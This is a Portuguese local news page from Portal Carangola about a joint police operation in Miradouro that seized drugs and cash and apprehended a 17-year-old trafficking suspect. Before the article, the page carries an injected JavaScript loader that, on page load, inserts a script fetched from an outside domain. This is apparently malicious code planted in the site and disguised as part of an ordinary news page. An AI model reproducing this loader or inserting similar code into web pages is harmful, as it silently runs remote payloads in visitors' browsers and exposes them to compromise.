;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Miradouro: PC e PM apreendem drogas, dinheiro e adolescente suspeito por tráfico. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Miradouro: PC e PM apreendem drogas, dinheiro e adolescente suspeito por tráfico.

miradouroPoliciais civis e militares apreenderam drogas, dinheiro e um adolescente de 17 anos, suspeito por tráfico de entorpecentes, durante ação conjunta deflagrada na cidade de Miradouro, nesta terça-feira (2). De acordo com a Policia Civil (PC), o menor detido e outro que não foi localizado são suspeitos de envolvimento com o tráfico de drogas e assassinatos.

Segundo mensagem enviada ao jornalismo da Rádio Muriaé pela 34ª Delegacia da PC em Miradouro, as equipes mandados judiciais de busca e apreensão em dois endereços e no primeiro deles apreenderam um morador de 17 anos, quatro buchas de maconha, um papelote com cerca de 10g de cocaína e duas pedras de crack, além de um “dichavador” e R$ 460,00 em dinheiro.

Já no outro imóvel, ainda conforme a polícia, foram recolhidos três papelotes de cocaína, uma pedra de crack e potes de fermento em pó, muito utilizados na mistura de cocaína, bem como dezenas de “sacolés” usados para embalo de drogas. O segundo suspeito, também de 17 anos, não estava no local.

O adolescente capturado na primeira diligência foi levado à delegacia local e de acordo com a nota, teve a apreensão ratificada por “ato infracional análogo ao Crime de Tráfico de Drogas e ficará acautelado, à disposição da Justiça”.

 

Informação: Rádio Muriaé com informações da Polícia Civil

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.